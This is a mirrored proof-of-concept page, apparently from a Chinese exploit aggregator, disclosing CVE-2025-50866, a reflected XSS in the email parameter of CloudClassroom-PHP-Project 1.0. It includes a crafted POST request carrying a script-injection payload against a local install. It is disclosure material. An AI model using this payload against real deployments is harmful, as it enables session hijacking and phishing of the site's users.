POC详情: c1ae0961fd75d2b2155e44161f915507a7242455

来源
https://github.com/SacX-7/CVE-2025-50866
关联漏洞
标题: CloudClassroom-PHP-Project 安全漏洞 (CVE-2025-50866)
描述:CloudClassroom-PHP-Project是Vishal Mathur个人开发者的一个云课堂网站。 CloudClassroom-PHP-Project 1.0版本存在安全漏洞,该漏洞源于反射型跨站脚本漏洞,可能导致会话劫持或钓鱼攻击。
描述
Cross Site Scripting (XSS)
介绍
CloudClassroom-PHP-Project 1.0 contains a reflected Cross-site
Scripting (XSS) vulnerability in the email parameter of the
postquerypublic endpoint. Improper sanitization allows an attacker to
inject arbitrary JavaScript code that executes in the context of the
user s browser, potentially leading to session hijacking or phishing
attacks.

------------------------------------------

Vulnerability Type : 

Cross Site Scripting (XSS)

------------------------------------------

Vendor of Product : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project

------------------------------------------

Affected Product Code Base : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0

------------------------------------------

Affected Component : 
postquerypublic.php, email parameter in POST request

------------------------------------------

Attack Type : 
Remote

------------------------------------------

Attack Vectors
------------------------------------------

An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable endpoint /CloudClassroom-PHP-Project-master/postquerypublic, injecting malicious JavaScript via the email parameter. The application reflects this input without sanitization, leading to reflected XSS.

------------------------------------------
Reproduction Steps:
------------------------------------------

Deploy the vulnerable PHP app locally (e.g., http://localhost/CloudClassroom-PHP-Project-master/).

Send the following POST request:

POST /CloudClassroom-PHP-Project-master/postquerypublic HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

email=testing@example.com'"()&%<zzz><ScRiPt >alert(9001)</ScRiPt>&gnamex=abc&squeryx=123&update=Post%20Query!

------------------------------------------

Reference
https://owasp.org/www-community/attacks/xss/

------------------------------------------

Discoverer : saurabh

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/
文件快照

 [4.0K]  /data/pocs/c1ae0961fd75d2b2155e44161f915507a7242455
├── [1.9K]  Cross Site Scripting (XSS)
└── [2.0K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。